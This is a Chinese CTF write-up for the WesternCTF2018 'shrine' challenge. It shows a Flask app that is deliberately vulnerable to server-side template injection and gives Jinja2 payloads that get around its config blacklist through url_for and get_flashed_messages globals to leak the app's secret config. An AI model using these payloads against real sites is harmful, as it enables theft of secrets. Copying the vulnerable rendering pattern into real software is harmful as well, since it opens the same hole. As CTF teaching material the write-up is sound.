buuctf-[WesternCTF2018]shrine(小宇特详解)

1.先看题目

import flask
import os

app = flask.Flask(__name__)

app.config['FLAG'] = os.environ.pop('FLAG')
//注册了一个名为FLAG的config

@app.route('/')
def index():
    return open(__file__).read()

@app.route('/shrine/<path:shrine>')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) //这里把config,self做了黑名单过滤，替换为空
        + s

    return flask.render_template_string(safe_jinja(shrine))

if __name__ == '__main__':
    app.run(debug=True)

这里推测flag在名为FLAG的config中，但是这里有黑名单过滤了config

这里可以进行ssti注入

这里进行判断

payload：

/shrine/{{6*6}}

这里可以进行ssti模板注入

这里可以利用两个python自带的函数来进行注入

url_for这个可以用来构造url，接受函数名作为第一个参数

get_flashed_message()是通过flash()传入闪现信息列表的，能够把字符串对象表示的信息加入到一个消息列表，然后通过调用get_flashed_message()来取出。

构造payload

/shrine/{{url_for.__globals__}}

这里的current_app意思是当前app，我们访问当前app的config

/shrine/{{url_for.__globals__['current_app'].config}}

然后get_flashed_message()也是同理

payload：

/shrine/{{get_flashed_messages.__globals__['current_app'].config}}